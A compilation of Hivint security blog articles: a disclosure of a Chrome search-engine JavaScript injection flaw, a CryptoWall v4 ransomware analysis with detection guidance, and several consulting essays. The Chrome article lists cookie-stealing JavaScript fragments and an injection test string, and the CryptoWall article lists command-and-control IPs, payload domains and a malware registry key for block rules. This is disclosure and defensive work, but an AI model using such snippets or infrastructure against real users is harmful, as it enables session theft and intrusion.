[email protected]   +1 (833) 3COLONY / +61 1300 733 940

Google Chrome — Default Search Engine Vulnerability


Introduction

In December 2015, Hivint’s Technical Security Specialist — Taran Dhillon — discovered a vulnerability in Google Chrome and the Chromium browser that allows an attacker to intercept sensitive information, authentication data and personal information from a target user.

This issue has been reported to the Google/Chromium team but as of July 2016 has not been rectified.

The vulnerability in the Chrome browser is due to the “Default Search Engine” functionality not restricting user input and allowing JavaScript code to be inserted and executed. The Default Search Engine functionality allows users to save and configure preferred search engines. When a user performs a search from the web browser by entering the search text directly into the URL bar, the web browser uses the default search settings configured earlier to perform this search.


Chrome Default search settings — with the Google search engine configured as the default search engine

To prevent unintended and unauthorised actions from users, data provided by users should be sanitised and/or restricted to prevent malicious data from being entered. The malicious data consists of malicious code supplied to the browser as Javascript. Input sanitation involves checking the text/characters a user enters and ensuring they do not contain any malicious code.

Combined with the fact that Google Chrome is the most popular web-browser with approx. 71.4% of all internet users, this vulnerability presents a significant security risk.

What is JavaScript and how can it be exploited maliciously?

JavaScript is one of the core programming languages used for web applications and its main function is in modifying the behaviour of web pages. It is extremely flexible and is often used to dynamically change the content on websites to provide a rich user experience.

Although JavaScript is normally used to improve a user’s web experience, it can also be used in malicious ways which include stealing personal information and sensitive data from target users.

Examples of JavaScript that can be used for malicious purposes using the vulnerability discussed in this article are:

  • escape(document.cookie); – Which can be used to steal a user’s browser cookies. Browser cookies contain information about the current user and may include: authentication information (which is generated when a user logs into a website to uniquely identify the user’s session), the contents of a user’s shopping cart (on an e-commerce site) and tracking information (used to track a user’s web-browsing habits, geographic location and source IP address).
  • escape(navigator.userAgent); – Used to display a target user’s web-browser type.
  • escape(document.baseURI); – Contains the URL of the website the user is currently browsing.

The examples above are only a small sample of JavaScript that can be used for malicious purposes with the vulnerability identified in this article.

How to check if you’re vulnerable

To check if your web-browser (Google Chrome / Chromium) is vulnerable, perform the following steps:

  1. Navigate to SettingsManage Search Engines.
  2. Scroll to the bottom of the Other Search Engines table.
  3. Click in the box marked Add a new search engine and enter any text, e.g. poison.
  4. Click in the box marked Keyword and enter any text, e.g. poison.
  5. Click in the box marked URL with %s in place of query and paste in the following text: javascript:window.location=alert(1);
  6. If the colour of the text-box turns from red to white, this indicates your browser is vulnerable.


Exploit Example

Replacing the Chrome “master_preferences” file (a file which is used by Chrome to set all of its default settings) is a method an attacker can use to deliver the exploit to a victim machine.

The code below creates a malicious “master_preferences” file which redirects all searches performed by the victim user to the attacker’s web-server (where the attacker receives the victim’s browser cookies, current browser URL and browser software information) and then sends the victim back to their original Google search.

This results in a seamless compromise of the victim user’s web browser that is extremely difficult for them to detect:


Video Demo

This video demonstrates how the vulnerability can be exploited:

  1. The user is tricked into loading malicious software.
  2. The malicious software containing the exploit is executed on the victim’s machine when the user opens the Chrome browser and searches ‘pwned’ in their browser
  3. Information is transmitted and intercepted by the attacker and the victim is then unknowingly redirected back to their search with the attack remaining undetected

How can I prevent myself from being exploited?

Currently, the only effective mitigation is to uninstall and not use Google Chrome or Chromium. Additionally, do not click on untrusted links on websites or open attachments or links in emails that are unexpected, from untrusted sources or which otherwise seem suspicious.


Article by Taran Dhillon, Security Specialist, Hivint

CryptoWall — Analysis and Behaviours


Key Behaviours of CryptoWall v4

This document details some initial research undertaken by Hivint into the newly released CryptoWall version 4 series of ransomware. A number of organisations we have worked with have experienced infections by CryptoWall and its variants, in some cases leading to severe consequences.

This research paper outlines more information about the latest version of CryptoWall, as well as providing guidance on possible methods for creating custom security controls within your IT environment to mitigate the threat of CryptoWall infections, as well as how to detect and respond to these infections if they do occur. Some lists of known payload sources, e-mail domains and payment pages associated with CryptoWall are also provided at the end of this paper for use in firewall rulesets and/or intrusion detection systems.

CryptoWall version exhibits the following new behaviours:

  • It now encrypts not only the data in your files, but the file names as well;
  • It still includes malware dropper mechanisms to avoid anti-virus detection — but this new version also possesses vastly improved communication capabilities. It still uses TOR, which it may be possible to block with packet-inspection functions on some firewalls. However, it has a modified version of the protocol that attempts to avoid being detected by 2nd generation enterprise firewall solutions.
  • It appears to inject itself into or migrate to svchost.exe and iexplore.exe. It also calls bcdedit.exe to disable the start-up restore feature of Windows. This means the system restore functions that were able to recover data in previous versions of the ransomware no longer work.

Infection Detection

Antivirus detection for this variant is generally very low, but there’s some work on detection taking place. ESET’s anti-virus solution, for example, detects the .js files used by CryptoWall in emails as JS/TrojanDownloader.Agent;

The most reliable method to detect Cryptowall v4 infections when creating rules in intrusion detection systems, firewalls, antivirus systems, or centralised log management servers is to create a rule to alert on creation of the following filenames, which are static within CryptoWall v4:

  • HELP_YOUR_FILES.TXT
  • HELP_YOUR_FILES.HTML
  • HELP_YOUR_FILES.PNG

It’s also worth noting that having in place a comprehensive, regular and consistent backup process for key organisational data is extremely important to combat the threat posed by ransomware such as CryptoWall v4. This will facilitate the prompt restoration of important files, limiting impacts of productivity.

Limiting the risk of Infection

CryptoWall v4 connects to a series of compromised web pages to download the payload. Some of the domain names hosting compromised pages are listed below — a useful step would be to create a regular expression on firewalls and other systems to block access to these domains:

  • pastimefoods.com
  • 19bee88.com
  • adrive62.com
  • httthanglong.com

Note that the list of compromised web pages is constantly evolving and so the implemented regular expression will require ongoing maintenance within corporate networks. See the lists at the end for more domains.
 
In the new version of CryptoWall, infected files have their file names appended with pseudorandom strings. As a result, filename encryption is harder to identify through pure examination of file extension names, unlike past versions of CryptoWall (in which ‘.encrypted’ was appended to the end of encrypted files). Thus, implementing an alert or blocking mechanism becomes more challenging.
 
However, it is possible to implement regular expression-based rules by considering the executable file names which are downloaded as part of an attempt to infect a system with CryptoWallv4. These are two known to be associated with CryptoWall v4 infections:

It may also be possible to write detection rules to find a static registry key indicating the presence of a CryptoWall infection. This can then be used to search over an entire corporate domain to locate infected machines, or possibly used in anti-virus / IDS signatures. An example is:

  • HKEY_USERSSoftwareMicrosoftWindowsCurrentVersionRun a6c784cb “C:UsersadminAppDataRoaminga6c784cb4ae38306a6.exe

Another step to consider is writing a custom list for corporate firewalls containing the domains that phishing e-mails associated with CryptoWall v4 infections are known to come from, as well as a list of known command-and-control servers. For example, one of the first e-mail domains to be reported was 163.com. In addition, some of the known command and control hosts that the ransomware makes calls to include:

  • mabawamathare.org
  • 184.168.47.225
  • 198.20.114.210
  • 143.95.248.187
  • 64.247.179.218
  • 52.91.146.127
  • 103.21.59.9

CryptoWall v4 also makes use of Google’s 8.8.8.8 service for DNS — this behaviour can be taken into account as part of determining whether there are additional security controls that can be implemented to mitigate the risk of infection. In addition, it appears that CryptoWall v4 makes outgoing calls to the following URLs (among others). These may also be useful in developing infection detection controls:

The initial controls we have worked with most customers to implement on their corporate networks included adding a rule to anti-virus detection systems to identify the ransom note file when it is created (i.e.: HELP_MY_FILES.txt). This enables network administrators to be promptly alerted to infections on the network. This is a valuable strategy in conjunction with maintaining lists of known bad domains related to the malware’s infection sources and infrastructure.

Lists of known payload sources, e-mail domains and payment pages associated with CryptoWall

We’ve included the following lists of payload sources, domains and pages associated with Cryptowall v4 infections — which some of our clients have used — to identify activity potentially associated with the ransomware. These can be used in addition to blacklists created and maintained by firewall and IDS vendors:

  • Decrypt Service contains a small list of the IP addresses for the decryption service. This is the page victims are directed to in order to pay the authors of Cryptowall for the decryption keys. These servers are located on the TOR Network but use servers on the regular web as proxies.
  • Email Origin IPs — contains IP addresses of known sources of CryptoWall v4 phishing e-mail origin servers — can be used in developing black lists on e-mail gateways and filtering services.
  • Outgoing DNS Requests — contains a list of IP addresses that CryptoWall v4 attempts to contact.
  • Payload Hosts — contains known sources of infection — including compromised web pages and other infection sources.

CryptoWall associated IP addresses

Article by John McColl, Principal Advisor, Hivint

Secure Coding in an Agile World: If The Slipper Fits, Wear It


Combining agile software development concepts in an increasingly cyber-security conscious world is a challenging hurdle for many organisations. We initially touched upon this in a previous article — An Elephant in Ballet Slippers? Bringing Agility To Cyber Security — in which Hivint discussed the need to embrace agile concepts in cyber security through informal peer-to-peer sharing of knowledge with development and operations teams and the importance of creating a culture of security within the organisation.

One of the most common and possibly biggest challenges when incorporating agility into security is the ability to effectively integrate security practices such as the use of Static Application Security Testing (SAST) tools in an agile development environment. The ongoing and rapid evolution of technology has served as a catalyst for some fast-paced organisations — wishing to stay ahead of the game — to deploy software releases on a daily basis. A by-product of this approach has been the introduction of agile development processes that have little room for security.

Ideally, security reviews should happen as often as possible prior to final software deployment and release, including prior to the transition from the development to staging environment, during the quality assurance process and finally prior to live release into production. However, these reviews will often require the reworking of source code to remediate security issues that have been identified. This obviously results in time imposts, which is often seen as a ‘blocker’ to the deployment pipeline. Yet the increase in media coverage of security issues in recent years highlights the importance of organisations doing all that they can to mitigate the risks of insecure software releases. This presents a significant conundrum: how do we maintain agility and stay ahead of the game, but still incorporate security into the development process?

One way of achieving this is through the use of a ‘hybrid’ approach that ensures any new software libraries, platforms or components being introduced into an organisation are thoroughly tested for security issues prior to release into the ‘agile’ development environment. This includes internal and external frameworks such as the reuse of internally created libraries or externally purchased software packages. Testing of any new software code introduced into an IT environment — whether externally sourced or internally produced — is typically contemplated as part of a traditional information security management system (ISMS) that many organisations have in place. Once that initial testing has taken place and appropriate remediation occurs for any identified security issues, the relevant software components are released into the agile environment and are able to be used by developers to build applications without the need for any further extensive testing. For example, consider a .NET platform that implements a cryptographic function using a framework such as Bouncy Castle. Both the platform and framework are tested for security issues using various types of testing methodologies such as vulnerability assessments and penetration tests. The developers are then allowed to use them within the agile development environment for the purposes of building their applications.

When a new feature or software library / platform is required (or a major version upgrade to an existing software library / platform occurs), an evaluation will need to occur in conjunction with the organisation’s security team to determine the extent of the changes and the risks this will introduce to the organisation. If the changes / additions are deemed significant, then the testing and assurance processes contemplated by the overarching ISMS will need to be followed prior to their introduction into the agile development environment.

This hybrid approach provides the flexibility that’s required by many organisations seeking an agile approach to software development, while still ensuring there is an overarching security testing and assurance process that is in place. This approach facilitates fast-paced development cycles (organisations can perform daily or even hourly code releases without having to go through various types of security reviews and testing), yet still enables the deployment of software that uses secure coding principles.

It may be that fitting the ballet slippers (agility) onto the elephant (security) is not as an improbable concept as it once seemed.


Article by Craig Searle, Chief Apiarist, Hivint

The Cyber Security Ecosystem: Collaborate or Collaborate. It’s your choice.


As cyber security as a field has grown in scope and influence, it has effectively become an ‘ecosystem’ of multiple players, all of whom either participate in or influence the way the field develops and/or operates. At Hivint, we believe it is crucial for those players to collaborate and work together to enhance the security posture of communities, nations and the globe, and that security consultants have an important role to play in facilitating this goal.

The eco-system untwined

The cyber security ecosystem can broadly be divided into two categories, with some players (e.g. governments) having roles in both categories:

Macro-level players

Consists of those stakeholders who are in a position to exert influence on the way the cyber security field looks and operates at the micro-level. Key examples include governments, regulators, policymakers and standards setting organisations and bodies (such as the International Organization for Standardization, Internet Engineering Task Force and National Institute for Standards and Technology).

Micro-level players

Consists of those stakeholders who, both collectively and individually, undertake actions on a day-to-day basis that affect the community’s overall cyber security posture (positively or negatively). Examples include end users/consumers, governments, online businesses, corporations, SMEs, financial institutions and security consultants (although as we’ll discuss later, the security consultant has a unique role that bridges across the other players at the micro-level).

The macro level has, in the past, been somewhat muted with its involvement in influencing developments in cyber security. Governments and regulators, for example, often operated at the fringes of cyber security and primarily left things to the micro-level. While collaboration occurred in some instances (for example, in response to cyber security incidents with national security implications), that was by no means expected.


The formalisation of collaborative security

This is rapidly changing. We are now regularly seeing more formalised models being (or planning to be) introduced to either strongly encourage or require collaboration on cyber security issues between multiple parties in the ecosystem.

Recent prominent examples include proposed draft legislation in Australia that would, if implemented, require nominated telecommunications service providers and network operators to notify government security agencies of network changes that could affect the ability of those networks to be protected[1], proposals for introducing legislative frameworks to encourage cyber security information sharing between the private sector and government in the United States[2], and the introduction of a formal requirement in the European Union for companies in certain sectors to report major security incidents to national authorities[3].

There are any number of reasons for this change, although the increasing public visibility given to cyber security incidents is likely at the top of the list (in October alone we have seen two of Australia’s major retailers suffer security breaches). In addition, there is a growing predilection toward collaborative models of governance in a range of cyber topic areas that have an international dimension (for example, the internet community is currently involved in deep discussions around transitioning the governance model for the internet’s DNS functions away from US government control towards a multi-stakeholder model). With cyber security issues frequently having a trans-national element — particularly discussions around setting ‘norms’ of conduct around cyber security at an international level[4] — it’s likely that players at the macro-level see this as an appropriate time to become more involved in influencing developments in the field at the national level.

Given this trend, it’s unlikely to be long before the macro-level players start to require compliance with minimum standards of security at the micro-level. As an example, the proposed Australian legislation referred to above would require network operators and service providers to do their best (by taking all reasonable steps) to protect their networks from unauthorised access or interference. And in the United States, a Federal Court of Appeals recently decided that their national consumer protection authority, the Federal Trade Commission, had jurisdiction to determine what might constitute an appropriate level of security for businesses in the United States to meet in order to avoid potential liability[5]. In Germany, legislation recently came into effect requiring minimum security requirements to be met by operators of critical infrastructure.

Security consultants — the links in the collaboration chain

Whatever the reasons for the push towards ‘collaborative’ security, it’s the micro-level players who work in the cyber security field day-to-day who will ultimately need to respond as more formal expectations are placed on players at the macro-level with regards to their security posture.

Hivint was in large part established to respond to this trend — we believe that security consultants have a crucial role to play in this process, including through building a system in which the outputs of consulting projects are shared within communities of interest who are facing common security challenges, thereby minimising redundant expenditure on security issues that other organisations have already faced. This system is called “The Security Colony” and is available now[6]. For more information on the reasons for its creation and what we hope to achieve, see our previous article on this topic.

We also believe there is a positive linkage between facilitating more collaboration between players at the micro-level of the ecosystem, and encouraging the creation of more proactive security cultures within organisations. Enabling businesses to minimise expenditure on security problems that have already been considered in other consulting projects enables them to focus their energies on implementing measures to encourage more proactive security — for example, as we discussed in a previous article, by educating employees on the importance of identifying and reporting basic security risks (such as the inappropriate sharing of system passwords). And encouraging a more proactive security culture within organisations will ultimately strengthen the nation’s overall cyber security posture and benefit the community as a whole.


Article by Craig Searle, Chief Apiarist, Hivint


[1] See in particular the proposed changes to section 313 of the Telecommunications Act 1997 (Cth).
[2] See https://www.fas.org/sgp/crs/misc/R44069.pdf for a description of these proposals.
[3] See http://ec.europa.eu/digital-agenda/en/news/network-and-information-security-nis-directive
[4] See for example http://www.project-syndicate.org/commentary/international-norms-cyberspace-by-joseph-s–nye-2015-05
[5] See http://www.technologylawdispatch.com/2015/08/privacy-data-protection/third-circuit-upholds-ftcs-authority-in-wyndham-case/?utm_source=Mondaq&utm_medium=syndication&utm_campaign=View-Original
[6] https://www.securitycolony.com/

Maturing Organisational Security and Security Service Catalogues


One of the key objectives for an information security professional is providing assurance that the systems which are implemented, or are soon to be implemented, are secure. A large part of this involves engaging with business and project teams proactively to ensure that security needs are met, while trying hard not to interfere with on-time project delivery.

Unfortunately, we’re not very good at it.

Recently, having agreed to conduct a security risk assessment (SRA) of a client’s SFTP solution, which they intended to use to transfer files to a vendor in place of their existing process of emailing the files, I sat down to discuss the security requirement with the Solution Designer, only to have him tell me that an SRA had been done before. Not just on the same design pattern, but on the exact same SFTP solution. They were simply adding an additional existing vendor to the solution to improve the security of their inter-company file transfer process. The organisation didn’t know how to go about evaluating the risks to the company of this change, so they used the ‘best fit’ security-related process available to it, which just happened to be an SRA.

Granted, in the example above, a new vendor might need to be assessed for the operational risk associated with them uploading files to our client’s environment, or if there were changes to the SFTP solution configuration. But in this case, the vendor had been working with them for some time so there was no further risk introduced, just a more secure business process: the risk was getting lower not higher.

While this is only one example, this scenario is not uncommon across many organisations we work with, across many industry sectors, and it’s only going to get harder. With more organisations moving to an agile development methodology and cloud deployments, ensuring security keeps up with new developments throughout the business is going to be critical to maintaining at least a modicum of security in these businesses.

So, if you’re getting asked to perform a risk assessment the day before go-live (yes, this still happens), you’re doing it wrong.

If you’re routinely performing your assessments of systems and technology within the project lifecycle, you’re doing it wrong.

If you’re engaging with your project teams with policy statements and standards documents, yes, unfortunately you’re also doing it wrong.

Projects are where things — often big things — change in an organisation’s business or technology environment. And where there is change, there is generally a key touch point for the security team. Projects will generally introduce the biggest potential vulnerabilities to your environment, but if there is an opportunity to positively influence the security outcomes at your organisation, it will also be as part of a project.

Once a system is in, it’s too late. If you haven’t already given your input to get a reasonably secure system, the project team will have moved on, their budget will have gone with them, and you’ll be left filling out that risk assessment that sits on some executive’s desk waiting for the risk to be accepted. Tick.

But on the flip-side, if you’re not proactively engaging with project teams and your business to provide solutions for them, you’re getting in the way.

Let’s face it, no project manager wants to read through dozens of pages of security policy and discern the requirements for their project — you may as well have told them through interpretive dance.

So, what’s the solution?

The solution is to look to the mature field of IT Service Management, and the concept of having a Service Catalogue.

A Security Services Catalogue is two things:

Firstly, it is a list of the security and assurance activities which the security team offers which are generally party of the system development lifecycle. These services may include a risk assessment, vulnerability assessment and penetration testing, and code review, among others. The important thing being that the services are well defined in terms of the offering inputs, outputs and process, and the required effort and price, so that the business and the project teams can effectively incorporate it into their budget and schedule.

Secondly, it is a list of the security services already implemented within the organisation and operated by or on behalf of the security team, which have been through your assurance processes and are effectively “approved for use” throughout the organisation. These services would be the implementation of a secure design pattern or blueprint, or form part of one of those blueprints. To get an idea, have a look at the OSA Security Architecture Landscape, or the Mozilla Service Catalog.

Referring quickly to Mozilla’s approach, a good example is their logging or monitoring or SIEM service. Assuming a regulatory and policy requirement for logging and monitoring for all systems throughout your environment, it allows the project team to save money and time by using the standardised service. Of course, using the already implemented tool is also common sense, but writing it down in a catalogue ensures that the security services on offer are communicated to the business, and that the logging and monitoring function for your new system is a known-quantity and effective.

The easiest way to describe this approach is “control inheritance” — where a particular implementation of a control is used by a system, that system inherits the characteristics of that control. Think of Active Directory — an access control mechanism. Once you’ve implemented and configured it securely, and it has been evaluated, you have a level of assurance that the control is effective. For all systems then using Active Directory, you have a reasonable level of assurance that they are access controlled, and you can spend your time evaluating other security aspects of the system. So communicate to your organisation that they can use it via your Security Service Catalogue.

And if your Project team wants to get creative? No problem, but anything not in the catalogue needs to go through your full assurance process. That — quite rightly — means risk assessments, control audits, code reviews, penetration tests, and vulnerability scans, which accurately reflects the fact that everything will be much easier for everyone if they pick from the catalogue where possible.

So, how does this work in practice?

Well, firstly, start by defining what level of assurance you need for a system to go into production, or to meet compliance. For example, should you need to meet PCI compliance, you’ll at least have to get your system vulnerability scanned and penetration tested. Create your service catalogue around these, and defining business rules for their use and the system development lifecycle stages in which they must be completed.

Secondly, you need to break down your environment into its constituent parts (specifically the security components), review and approve each of those parts, and add them to your Security Service Catalogue. Any system then using those security services as part of its functionality, inherits the security of those services, and you can have a degree of assurance that the system will be secure (at least to the degree that the system is solely comprised of approved components).

The benefits are fourfold:
Project teams can simply select the services they want to integrate with, and know that those services meet the requirements of the security policy. No mess, no fuss.
Projects go faster, project teams know what the expectations are for them, and aren’t held up by the security inquisitor demanding their resources’ time.
Budget predictability. Project teams know the costs which need to be included in their budget up front. They can also choose a security service which is a known-quantity, which means there is a lower chance of a risk eventuating that needs them to pay to change aspects of the system to meet compliance or remediate a vulnerability.

You don’t need to check the security of the re-used components used by those projects over and over again.
For example, you might use an on-premise Active Directory instance with which identity and access management is performed; or maybe it’s hosted in Azure. Perhaps you use Okta, a cloud based SaaS Identity and Access Control service. For logging and monitoring, you might use Splunk or AlienVault as your organisation-wide security monitoring service, or maybe you outsource it to AlertLogic. Whatever. Perform your due diligence, and add it to your catalogue.

Once it’s in your catalogue, you should assess it annually, as part of your business as usual security practices — firstly for risk, secondly at a technical level to validate your risk findings, and finally in a market context to see if there are better controls now available to address the same risk issue.

I’ve been part of a small team building a security certification and accreditation program from scratch, and have seen that the only way to scale the certification process, and ensure sufficient depth of security review across the multitude of systems present in most organisations, is to make sure unnecessary re-hashing of solution reviews is minimised, using these “control inheritance” principles.

Thirdly, develop a Security Requirements Document (SRD) template based upon your Security Services Catalogue. This is where you define the services available and requirements for your project teams, and make the choices really easy for them. Either use the services in the security services catalogue, or comply with all the requirements of the Password Policy, Access Control Policy, Encryption Policy, etc. After a time, your Project Lifecycle will mature, your Security Services will become more standardised and robust, and your life will become significantly easier.

Lastly, get involved with your project teams. Your project teams are not security experts, you are. And the sooner you make it easy for them to get what resources and expertise you have available, the sooner they can make the best decisions for your organisation, the more secure your organisation will be. Make the secure way the easy way, and everyone’s life will be a little more comfortable.


Article by Ben Waters, Senior Security Advisor, Hivint

Security Collaboration — The Problem and Our Solution


Colleagues, the way we are currently approaching information security is broken.

This is especially true with regard to the way the industry currently provides, and consumes, information security consulting services. Starting with Frederick Winslow Taylor’s “Scientific Management” techniques of the 1890s, consulting is fundamentally designed for companies to get targeted specialist advice to allow them to find a competitive advantage and beat the stuffing out of their peers.

But information security is different. It is one of the most wildly inefficient things to try to compete on, which is why most organisations are more than happy to say that they don’t want to compete on security (unless their core business is, actually, security).

Why is it inefficient to compete on security? Here are a couple of reasons:

Customers don’t want you to.Customers quite rightly expect sufficient security everywhere, and want to be able to go to the florist with the best flowers, or the best priced flowers, rather than having to figure out whether that particular florist is more or less secure than the other one.

No individual organisation can afford to solve the problem.With so much shared infrastructure, so many suppliers and business partners, and almost no ability to recoup the costs invested in security, it is simply not cost-viable to throw the amount of money really needed at the problem. (Which, incidentally, is why we keep going around in circles saying that budgets aren’t high enough — they aren’t, if we keep doing things the way we’re currently doing things.)

Some examples of how our current approach is failing us:

We are wasting money on information security governance, risk and compliance

There are 81 credit unions listed on the APRA website as Authorised Deposit-Taking Institutions. According to the ABS, in June 2013 (the most recent data), there were 77 ISPs in Australia with over 1,000 subscribers. The thought that these 81 credit unions would independently be developing their own security and compliance processes around security, and the 77 ISPs are doing the same, despite the fact that the vast majority of their risks and requirements are going to be identical as their peers, is frightening.

The wasted investment in our current approach to information security governance is extreme. Five or so years ago, when companies started realising that they needed a social media security policy, hundreds of organisations engaged hundreds of consultants, to write hundreds of social media security policies, at an economy-wide cost of hundreds of thousands, if not millions, of dollars. That. Is. Crazy.

We need to go beyond “not competing” and cross the bridge to “collaboration”. Genuine, real, sharing of information and collaboration to make everyone more secure.

We are wasting money when getting technical security services

As a technical example, I met recently with a hospital where we will be doing some penetration testing. We will be testing one of their off-the-shelf clinical information system software packages. The software package is enormous — literally dozens of different user privilege levels, dozens of system inter-connections, and dozens of modules and functions. It would easily take a team of consultants months, if not a year or more, to test the whole thing thoroughly. No hospital is going to have a budget to cover that (and really, they shouldn’t have to), so rather than the 500 days of testing that would be comprehensive, we will do 10 days of testing and find as much as we can.

But as this is an off-the-shelf system, used by hundreds of hospitals around the world, there are no doubt dozens, maybe even hundreds, of the same tests happening against that same system this year. Maybe there are 100 distinct tests, each of 10 days’ duration being done. That’s 1,000 days of testing — or more than enough to provide comprehensive coverage of the system. But instead, everyone is getting a 10 day test done, and we are all worse off for it. The hospitals have insecure systems, and we — as potential patients and users of the system — wear the risk of it.

The system is broken. There needs to be collaboration. Nobody wants a competitive advantage here. Nobody can get a competitive advantage here.

So what do we do about it?

There is a better way, and Hivint is building a business and a system that supports it. This system is called “The Colony”.

It is an implementation of what we’re calling “Community Driven Security”. This isn’t crowd-sourcing but involves sharing information within communities of interest who are experiencing common challenges.

The model provides benefits to the industry both for the companies who today are getting consulting services, and for the companies who can’t afford them:

Making consulting projects cheaper the first time they are done.If a client is willing to share the output of a project (that has, of course, been de-sensitised and de-identified) then we can reduce the cost of that consulting project by effectively “buying back” the IP being created, in order to re-use it. Clients get the same services they always get; and the sharing of the information will have no impact on their security or competitive position. So why not share it and pocket the savings?

Making that material available to the community and offering an immediate return on investment.Through our portal — being launched in June — for a monthly fee of a few hundred dollars, subscribers will be able to get access to all of that content. That means that for a few hundred dollars a month, a subscriber will be able to access the output from hundreds of thousands of dollars worth of projects, every month.

Making subsequent consulting projects cheaper and faster. Once we’ve completed a certain project type — say, developing a suite of incident response scenarios and quick reference guides — then the next organisation who needs a similar project can start from that and pay only for the changes required (and if those changes improve the core resources, those changes will flow through to the portal too).

Identifying GRC “Zero Days”.Someone, somewhere, first identified that organisations needed a social media security policy, and got one developed. There was probably a period of months, or even years, between that point and when it became ubiquitous. Through the portal, organisations who haven’t even contemplated that such a need may exist, would be able to see that it has been identified and delivered, and if they want to address the risk before it materialises for them, they have the chance. And there is no incremental cost over membership to the portal to grab it and use it.

Supporting crowd-funding of projects. The portal will provide the ability for organisations to effectively ‘crowd fund’ technical security assessments against software or hardware that is used by multiple organisations. The maths is pretty simple. If two organisations are each looking at spending $30,000 to test System X, getting 15 days of testing for that investment, if they each put $20,000 in to a central pool to test System X, they’ll get 20 days of testing and save $10,000 each. More testing, for lower cost, resulting in better security. Everyone wins.

What else is going in to the portal?

We have a roadmap that stretches well into the future. We will be including Threat Intelligence, Breach Intelligence, Managed Security Analytics, the ability to interact with our consultants and ask either private or public questions, the ability to share resources within communities of interest, project management and scheduling, and a lot more. Version 1 will be released in June 2015 and will include the resource portal (ie the documents from our consulting engagements), Threat Intelligence and Breach Intelligence plus the ability to interact with our consultants and ask private or public questions.

“Everyone” can’t win. Who loses?

The only people that will potentially lose out of this, are security consultants. But even there we don’t think that will be the case. It is our belief that the market is supply side constrained — in other words, we believe we are going to be massively increasing the ‘output’ for the economy-wide consulting investment in information security; but we don’t expect companies will spend less (they’ll just do more, achieving better security maturity and raising the bar for everyone).

So who loses? Hopefully, the bad guys, because the baseline of security across the economy gets better and it costs them more to break in.

Is there a precedent for this?

The NSW Government Digital Information Security Policy has as a Core Requirement, and a Minimum Control, that “a collaborative approach to information security, facilitated by the sharing of information security experience and knowledge, must be maintained.”

A lot of collaboration on security so far has been about securing the collaboration process itself. For example, that means health organisations collaborating to ensure that health data flowing between the organisations is secure throughout that collaborative process. But we believe collaboration needs to be broader: it needs to not just be about securing the collaborative footprint, but rather securing the entire of each other’s organisations.

Banks and others have for a long time had informal networks for sharing threat information, and the CISOs of banks regularly get together and share notes. The CISOs of global stock exchanges regularly get together similarly. There’s even a forum called ANZPIT, the Australian and New Zealand Parliamentary IT forum, for the IT managers of various state and federal Parliaments to come together and share information across all areas of IT. But in almost all of these cases, while the meetings and the discussions occur, the on-the-ground sharing of detailed resources happens much less.

The Trusted Information Sharing Network (TISN) has worked to share — and in many cases develop — in depth resources for information security. (In our past lives, we wrote many of them). But these are $50K-100K endeavours per report, generally limited to 2 or 3 reports per year, and generally provide a fairly heavy weight approach to the topic at hand.

Our belief is that while “the 1%” of attacks — the APTs from China — get all the media love, we can do a lot of good by helping organisations with very practical and pragmatic support to address the 99% of attacks that aren’t State-sponsored zero-days. Templates, guidelines, lists of risks, sample documents, and other highly practical material is the core of what organisations really need.

What if a project is really, really sensitive?

Once project outcomes are de-identified and de-sensitised, they’re often still very valuable to others, and not really of any consequence to the originating company. If you’re worried about it, you can review the resources before they get published.

So how does it work?

You give us a problem, we’ll scope it, quote it, and deliver it with expert consultants. (This part of the experience is the same as your current consulting engagements)
We offer a reduced fee for service delivery (percentage reduction dependent on re-usability of output).
Created resources, documents, and de-identified findings become part of our portal for community benefit.

Great. Where to from here?

There are two things we need right now:

Consulting engagements that drive the content creation for the portal. Give us the chance to pitch our services for your information security consulting projects. We’ve got a great team, the costs are lower, and you’ll also be helping our vision of “community driven security” become a reality. Get in touch and tell us about your requirements to see how we can help.
Sign up for the portal (you’ve done this bit!) and get involved — send us some questions, download some documents, subscribe if you find it useful.
And of course we’d welcome any thoughts or input. We are investing a lot into this, and are excited about the possibilities it is going to create.


Article by Nick Ellsmore, Chief Apiarist, Hivint

Hivint’s 2016–17 Tech Year in Review

Over the course of the 2016–17 financial year, Hivint completed 117 technical security assessments ranging from source code reviews through to whole of organisation penetration tests for our clients.

One of our driving values is collaboration, so in this spirit, we wish to share statistics and observations about our year.

We hope that by sharing this information, we’ll provide an insight into the security assurance activities delivered by an Australian cyber-security consultancy. We also hope that over time, we’ll be able to identify and present trends in the evolving nature of assurance activities — supported by clear facts and figures as opposed to general observations.

Engagements

Our security assessments were delivered to Australian and international clients across a wide-range of industries, with the following chart providing the breakdown across industries.


It’s clear that our main clients for technical security assurance activities are positioned within the Finance, Government and Technology sectors, with approximately twice as many engagements performed in each of these sectors compared to the remainder. We believe that this can be attributed to:

  • The Finance industry being one of the more ‘security mature’ industries, and one that demands a high level of security assurance due to being a common attack target because of the potential of direct financial gain possible
  • The Technology industry maintaining a greater overall understanding of technical security risks and (similar to the Finance industry) demanding a high level of security assurance
  • The Government through its sheer size, and the need to obtain general periodic security assurance

The engagements completed varied greatly in the work effort, target and type of assessment performed. The 117 assessments undertaken ranged from short, single-day vulnerability assessments (intended to provide a limited, final quality assurance on a new system) to multi-month organisation wide penetration testing and vulnerability assessment activities. Engagements included configuration reviews, testing of hardware / IoT devices, mobile and web applications, wireless and network infrastructure, source code reviews and more, with web application testing being the most common assessment type (being the primary focus of 50 of the 117 assessments completed).

Findings

Through the 117 assessments undertaken, a total of 720 findings were identified. Findings which were deemed to not present a security risk (i.e. informational findings) are not included in this total.

To assess the risk of our security findings, Hivint employs an ISO 31000 aligned risk assessment framework, and employed common likelihood, impact and overall risk criteria. The table below provides a breakdown of the number and severity of findings.


The below chart provides the breakdown of the number of findings (from the Extreme down to Very Low risk severity) for each of the different industries.


Based on these ‘raw’ numbers, it’s clear that the majority of findings are presented as Low risks, with the number of findings tapering off as the risk severity increases. It is acknowledged however that these ‘raw’ numbers may be skewed due to the number and type of engagements performed for that industry — such that if the technology sector underwent the most engagements, then it seems reasonable that it would have the highest number of findings. To reduce this potential skew, the following chart has been provided which includes an average of the number of findings (for each risk rating) across the number of engagements completed for all clients in that industry sector.


With this normalised data, all industry sectors (except one) followed a fairly predictable pattern of having higher numbers of lower-risk issues, and lower numbers of high-risk issues. More mature industry sectors (such as Financial Services and Technology) showed a much more rapid drop-off as the risk of the issues increased. I.e. for these sectors, High risk issues as a proportion of all issues presented at a much lower rate, with the ratio of Low:High issues in Finance, Technology, Legal and some others being roughly 10–20:1. This is contrasted with Sports which is closer to 2:1.

